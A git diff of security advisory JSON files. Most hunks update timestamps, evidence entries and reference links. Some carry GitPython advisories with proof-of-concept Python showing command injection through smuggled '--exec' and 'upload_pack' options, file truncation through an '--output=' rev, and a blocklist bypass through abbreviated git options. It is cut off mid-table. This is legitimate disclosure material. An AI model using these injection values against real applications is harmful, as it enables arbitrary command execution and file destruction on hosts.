"2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2021-27291.json b/advisories/BREW-hapless-CVE-2021-27291.json index d1a07eb17af..7e13aa0eff8 100644 --- a/advisories/BREW-hapless-CVE-2021-27291.json +++ b/advisories/BREW-hapless-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2021-27291", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2022-40896.json b/advisories/BREW-hapless-CVE-2022-40896.json index 03f462d5977..0ebf4fe0918 100644 --- a/advisories/BREW-hapless-CVE-2022-40896.json +++ b/advisories/BREW-hapless-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2022-40896", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2023-26302.json b/advisories/BREW-hapless-CVE-2023-26302.json index b0ae2088be9..eaa39481cec 100644 --- a/advisories/BREW-hapless-CVE-2023-26302.json +++ b/advisories/BREW-hapless-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2023-26302", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2023-26303.json b/advisories/BREW-hapless-CVE-2023-26303.json index b635817e883..bd0c96c7125 100644 --- a/advisories/BREW-hapless-CVE-2023-26303.json +++ b/advisories/BREW-hapless-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2023-26303", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-hapless-CVE-2026-4539.json b/advisories/BREW-hapless-CVE-2026-4539.json index 042ea0060ea..cae1338bb70 100644 --- a/advisories/BREW-hapless-CVE-2026-4539.json +++ b/advisories/BREW-hapless-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-hapless-CVE-2026-4539", "published": "2026-08-13T16:55:33Z", - "modified": "2026-08-13T16:55:33Z", + "modified": "2026-09-10T19:24:31Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2022-24439.json b/advisories/BREW-legit-CVE-2022-24439.json index 18b901c59f1..680441505d6 100644 --- a/advisories/BREW-legit-CVE-2022-24439.json +++ b/advisories/BREW-legit-CVE-2022-24439.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2022-24439", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hcpj-qp55-gfph", "CVE-2022-24439", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-40267.json b/advisories/BREW-legit-CVE-2023-40267.json index 8000ebe03ed..f98ce0f60fb 100644 --- a/advisories/BREW-legit-CVE-2023-40267.json +++ b/advisories/BREW-legit-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-40267", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-40590.json b/advisories/BREW-legit-CVE-2023-40590.json index b554d0a0b15..733c7ffce2d 100644 --- a/advisories/BREW-legit-CVE-2023-40590.json +++ b/advisories/BREW-legit-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-40590", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2023-41040.json b/advisories/BREW-legit-CVE-2023-41040.json index 9fc09896d7b..9adc8eb9260 100644 --- a/advisories/BREW-legit-CVE-2023-41040.json +++ b/advisories/BREW-legit-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2023-41040", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2024-22190.json b/advisories/BREW-legit-CVE-2024-22190.json index 360c3408ef4..81a4bd46431 100644 --- a/advisories/BREW-legit-CVE-2024-22190.json +++ b/advisories/BREW-legit-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2024-22190", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-42215.json b/advisories/BREW-legit-CVE-2026-42215.json index 99c9196d941..c308aafec3e 100644 --- a/advisories/BREW-legit-CVE-2026-42215.json +++ b/advisories/BREW-legit-CVE-2026-42215.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-42215", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-rpm5-65cw-6hj4", "CVE-2026-42215", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-42284.json b/advisories/BREW-legit-CVE-2026-42284.json index 4445bf3b47a..5eac5e9e1b1 100644 --- a/advisories/BREW-legit-CVE-2026-42284.json +++ b/advisories/BREW-legit-CVE-2026-42284.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-42284", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-x2qx-6953-8485", "CVE-2026-42284", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-44243.json b/advisories/BREW-legit-CVE-2026-44243.json index f221e536f32..d3cc0a5678c 100644 --- a/advisories/BREW-legit-CVE-2026-44243.json +++ b/advisories/BREW-legit-CVE-2026-44243.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-44243", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-7545-fcxq-7j24", "CVE-2026-44243", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-44244.json b/advisories/BREW-legit-CVE-2026-44244.json index c880347ecb1..99fe4bc84c1 100644 --- a/advisories/BREW-legit-CVE-2026-44244.json +++ b/advisories/BREW-legit-CVE-2026-44244.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-44244", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-v87r-6q3f-2j67", "CVE-2026-44244", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-67322.json b/advisories/BREW-legit-CVE-2026-67322.json index f4e709c8752..73de33c81f5 100644 --- a/advisories/BREW-legit-CVE-2026-67322.json +++ b/advisories/BREW-legit-CVE-2026-67322.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67322", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-rwj8-pgh3-r573", - "CVE-2026-67322" + "CVE-2026-67322", + "PYSEC-2026-3842" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-rwj8-pgh3-r573" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67322" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2172" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.52" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-environment-variable-exfiltration-via-clone-from" } ] } diff --git a/advisories/BREW-legit-CVE-2026-67323.json b/advisories/BREW-legit-CVE-2026-67323.json index 525092cec03..1a2969e8823 100644 --- a/advisories/BREW-legit-CVE-2026-67323.json +++ b/advisories/BREW-legit-CVE-2026-67323.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67323", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-956x-8gvw-wg5v", - "CVE-2026-67323" + "CVE-2026-67323", + "PYSEC-2026-3839" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: command injection via unguarded Git options in `Repo.archive()`, `git.ls_remote()`, and arbitrary file overwrite via `Repo.iter_commits()` / `Repo.blame()`", - "details": "## Summary\n\nGitPython spawns the real `git` binary with an argument vector built from caller-supplied values. To prevent argument injection, GitPython maintains denylists of \"unsafe\" Git options (`--upload-pack`, `--receive-pack`, `--exec`, `-c`, `--config`, …) that can be abused to run arbitrary commands, and enforces them with `Git.check_unsafe_options()`.\n\nThat enforcement is only wired into the **network** commands — `clone_from`, `Remote.fetch`, `Remote.pull`, `Remote.push`. Several other public APIs that also forward caller-controlled values into the `git` argv have **no guard at all**:\n\n1. **`Repo.archive(ostream, treeish=None, prefix=None, **kwargs)`** forwards `**kwargs` verbatim into `git archive`. An attacker-influenced options mapping such as `{\"remote\": \".\", \"exec\": \"\"}` becomes `git archive --remote=. --exec= -- `, and `git archive --remote=` invokes `git-upload-archive` whose path is overridden by `--exec` → **arbitrary command execution under default Git configuration** (no `protocol.ext.allow` needed).\n\n2. **`repo.git.ls_remote(, upload_pack=\"\")`** (and the dynamic-command builder generally) turns the `upload_pack` kwarg into `--upload-pack=` with no guard → **arbitrary command execution**.\n\n3. **`Repo.iter_commits(rev)`** and **`Repo.blame(rev, file)`** place the caller's `rev` value into the argv *before* the `--` end-of-options separator and apply no leading-dash check. A benign-looking ref value such as `--output=/path/to/file` is parsed by `git rev-list` / `git blame` as the `--output` option, which **opens and truncates an arbitrary file** before Git even validates the revision → arbitrary file clobber (integrity/availability; can destroy keys, configs, lockfiles, or be aimed at files the host later sources).\n\nThe first two are direct code execution; the third is an arbitrary file-overwrite primitive. All share one root cause: the `check_unsafe_options` / end-of-options discipline that GitPython applies to clone/fetch/pull/push was never extended to these sinks.\n\n## Details\n\nGitPython explicitly recognises these options as command-execution vectors. `git/remote.py:535`:\n\n```python\nunsafe_git_fetch_options = [\n # Arbitrary command execution.\n \"--upload-pack\",\n \"--receive-pack\",\n # Arbitrary file overwrite.\n \"--exec\",\n]\n```\n\nand enforces them via `Git.check_unsafe_options()` (`git/cmd.py:963`):\n\n```python\ndef check_unsafe_options(cls, options, unsafe_options):\n ...\n if unsafe_option is not None:\n raise UnsafeOptionError(f\"{unsafe_option} is not allowed, use `allow_unsafe_options=True` to allow it.\")\n```\n\nBut `check_unsafe_options` is invoked from **only five sites**, all network commands:\n\n```\ngit/remote.py:1071 Remote.fetch\ngit/remote.py:1125 Remote.pull\ngit/remote.py:1198 Remote.push\ngit/repo/base.py:1410 / :1412 Repo.clone_from\n```\n\nThe following sinks call `git` with caller-controlled options/positionals and are **not** guarded:\n\n### 1. `Repo.archive` — command execution (`git/repo/base.py:1623`)\n\n```python\ndef archive(self, ostream, treeish=None, prefix=None, **kwargs):\n ...\n self.git.archive(\"--\", treeish, *path, **kwargs)\n return self\n```\n\n`treeish` and `path` are correctly placed after `--`, but `**kwargs` are converted by `Git.transform_kwarg` (`git/cmd.py:1487`) into `--=` flags and inserted **before** the `--` by `_call_process`, with no `check_unsafe_options`. `Repo.archive` already documents user-facing kwargs (`format`, `prefix`, `path`), so forwarding a caller options mapping is an expected usage. Final argv:\n\n```\ngit archive --remote=. --exec= -- \n```\n\n`git archive --remote=` runs the upload-archive helper; `--exec=` overrides the helper path, executing `` on the host. This works with **default Git config** — it does not rely on the `ext::` transport (which is blocked by default).\n\n### 2. `repo.git.ls_remote(..., upload_pack=...)` — command execution (dynamic builder, `git/cmd.py:1487`)\n\n`transform_kwarg` dashifies `upload_pack` → `--upload-pack=`. `git ls-remote --upload-pack=` executes ``. The dynamic builder makes **both** the flag name and value caller-controlled (`repo.git.(**user_dict)`), and `ls_remote` has no `check_unsafe_options`.\n\nThis is exactly the underscore-kwarg-vs-hyphen-kwarg gap that CVE-2026-42215 fixed for `fetch`/`pull`/`push`/`clone_from` — but `ls_remote` and the rest of the dynamic surface were left unpatched.\n\n### 3. `Repo.iter_commits` / `Repo.blame` — arbitrary file overwrite (`git/objects/commit.py:348`, `git/repo/base.py:1199`)\n\n```python\n# Commit.iter_items (reached via Repo.iter_commits)\nproc = repo.git.rev_list(rev, args_list, as_process=True, **kwargs) # args_list == [\"--\", *paths]\n```\n\n```python\n# Repo.blame\ndata = self.git.blame(rev, *rev_opts, \"--\", file, p=True, stdout_as_string=False, **kwargs)\n```\n\n`rev` is placed **before** `--`, with no leading-dash check anywhere in the path. A caller passing `rev=\"--output=/path\"` (a value that looks like an ordinary ref/branch/tag string an app forwards from user input) produces:\n\n```\ngit rev-list --output=/path --\n```\n\n`git rev-list`/`log`/`blame` honour `--output=`, which `open()`s and truncates the file *before* validating the revision — so the file is destroyed even though Git then errors out on the bad revision.\n\n## PoC\n\nAll three PoCs are self-contained, run against the released **GitPython 3.1.50** under **default Git configuration**, and were executed live (git 2.51.0). Each prints a host-side marker proving the effect.\n\n### Install\n\n```bash\npython3 -m venv venv && . venv/bin/activate\npip install GitPython # resolves to 3.1.50\npython -c \"import git; print(git.__version__)\" # 3.1.50\n```\n\n### PoC 1 — command execution via `Repo.archive`\n\n```python\n# archive_rce.py\nimport io, os, tempfile, subprocess, git\n\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\n\nmarker = os.path.join(tempfile.gettempdir(), 'gp_rce_marker')\nif os.path.exists(marker): os.remove(marker)\n\n# a service lets a user export a repo and forwards their options dict\nopts = {'remote': '.', 'exec': 'touch ' + marker}\ntry:\n repo.archive(io.BytesIO(), **opts)\nexcept git.exc.GitCommandError as e:\n print('[*] git exited non-zero (expected), but the exec already ran:', str(e).splitlines()[0][:60])\n\nprint('[+] marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git exited non-zero (expected), but the exec already ran: Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n`git config --get protocol.ext.allow` returns nothing (unset = default), confirming no special config is required.\n\n### PoC 2 — command execution via `git.ls_remote(upload_pack=...)`\n\n```python\n# lsremote_rce.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nmarker = os.path.join(tempfile.gettempdir(),'gp_lsr_marker')\nif os.path.exists(marker): os.remove(marker)\ntry:\n repo.git.ls_remote('.', upload_pack='touch '+marker+';')\nexcept git.exc.GitCommandError as e:\n print('[*] git err:', str(e).splitlines()[0][:50])\nprint('[+] ls-remote marker present:', os.path.exists(marker))\n```\n\nVerbatim output:\n\n```\n[*] git err: Cmd('git') failed due to: exit code(128)\n[+] ls-remote marker present: True\n```\n\n### PoC 3 — arbitrary file overwrite via a benign-looking `rev`\n\n```python\n# itercommits_filewrite.py\nimport os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a','commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\nvictim = os.path.join(tempfile.gettempdir(),'gp_fw_victim')\nopen(victim,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(victim).read()))\nuser_ref = '--output=' + victim # value an app forwards as a \"ref/branch\"\ntry:\n list(repo.iter_commits(user_ref))\nexcept git.exc.GitCommandError as e:\n print('[*] git err (after open+truncate):', str(e).splitlines()[0][:50])\nprint('[+] after :', repr(open(victim).read()), '<- truncated')\n```\n\nVerbatim output:\n\n```\n[*] before: 'do not delete\\n'\n[*] git err (after open+truncate): Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", + "details": "## Summary\n\nGitPython already know that --upload-pack / --exec are command-exec vectors, they are denylist in\ngit/remote.py:535 and check by Git.check_unsafe_options() (git/cmd.py:963), the thing is this\ncheck him he is only call from fetch, pull, push and clone_from, everything else who build a git\nargv from caller values just go through, no check, three examples\n\n## Code analysis\n\nRepo.archive (git/repo/base.py:1623) do self.git.archive(\"--\", treeish, *path, **kwargs), the\ntreeish is after the --, but the kwargs get dashify by transform_kwarg (git/cmd.py:1487) and\nthey land before it, so {\"remote\": \".\", \"exec\": \"\"} give\ngit archive --remote=. --exec= -- , the --remote spawn the upload-archive helper and\n--exec choose which binary that is, done, default git config, no protocol.ext.allow needed, and\narchive already document caller kwargs (format, prefix, path) so pass a dict is normal usage\n\nrepo.git.ls_remote(url, upload_pack=\"\"), same builder, same result, it's exactly the kwarg\ngap that CVE-2026-42215 close for fetch/pull/push/clone_from, except the dynamic\nrepo.git.(**user_dict) surface him he never got the fix\n\nRepo.iter_commits / Repo.blame (git/objects/commit.py:348, git/repo/base.py:1199) put the rev\nbefore the --, no leading-dash check, a \"branch name\" like --output=/etc/whatever become\ngit rev-list --output=... --, and git he open and truncate that file before he even validate the\nrevision, the file is gone even if the command error right after\n\n## PoC\n\nReleased 3.1.50, git 2.51.0, stock config (`git config --get protocol.ext.allow` returns nothing here).\n\n```\npip install GitPython # 3.1.50\n```\n\nCommon setup for the three:\n\n```python\nimport io, os, tempfile, subprocess, git\nd = tempfile.mkdtemp()\nsubprocess.run(['git','init','-q',d], check=True)\nsubprocess.run(['git','-C',d,'-c','user.email=a@b.c','-c','user.name=a',\n 'commit','-q','--allow-empty','-m','init'], check=True)\nrepo = git.Repo(d)\ntmp = tempfile.gettempdir()\n```\n\n1. exec via archive (a service exports a repo and forwards the user's options dict):\n\n```python\nm = os.path.join(tmp, 'gp_archive_check')\ntry: repo.archive(io.BytesIO(), **{'remote': '.', 'exec': 'touch ' + m})\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n2. exec via ls_remote:\n\n```python\nm = os.path.join(tmp, 'gp_lsremote_check')\ntry: repo.git.ls_remote('.', upload_pack='touch ' + m + ';')\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] marker present:', os.path.exists(m))\n```\n```\n[*] Cmd('git') failed due to: exit code(128)\n[+] marker present: True\n```\n\n3. file clobber via a rev that looks like a ref:\n\n```python\nv = os.path.join(tmp, 'release_notes.txt')\nopen(v,'w').write('do not delete\\n')\nprint('[*] before:', repr(open(v).read()))\ntry: list(repo.iter_commits('--output=' + v))\nexcept git.exc.GitCommandError as e: print('[*]', str(e).splitlines()[0][:55])\nprint('[+] after :', repr(open(v).read()), '<- truncated')\n```\n```\n[*] before: 'do not delete\\n'\n[*] Cmd('git') failed due to: exit code(129)\n[+] after : '' <- truncated\n```", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-956x-8gvw-wg5v" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67323" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2163" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-unguarded-git-options" } ] } diff --git a/advisories/BREW-legit-CVE-2026-67324.json b/advisories/BREW-legit-CVE-2026-67324.json index 372f922cd2d..f57a4a74daf 100644 --- a/advisories/BREW-legit-CVE-2026-67324.json +++ b/advisories/BREW-legit-CVE-2026-67324.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67324", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-v396-v7q4-x2qj", - "CVE-2026-67324" + "CVE-2026-67324", + "PYSEC-2026-3947" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-67325.json b/advisories/BREW-legit-CVE-2026-67325.json index 4a65c1808ae..da835c7cd5a 100644 --- a/advisories/BREW-legit-CVE-2026-67325.json +++ b/advisories/BREW-legit-CVE-2026-67325.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-67325", "published": "2026-08-13T17:02:43Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-2f96-g7mh-g2hx", - "CVE-2026-67325" + "CVE-2026-67325", + "PYSEC-2026-3836" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Command Injection via git long-option prefix abbreviation bypass of CVE-2026-42215 blocklist", - "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**CWE:** CWE-184 (Incomplete List of Disallowed Inputs) → CWE-78 (OS Command Injection)\n**Severity:** inherits the parent CVE-2026-42215 surface; estimated High, ~8.8 (`AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`) — final scoring deferred to maintainer/CNA, mirroring the parent.\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | 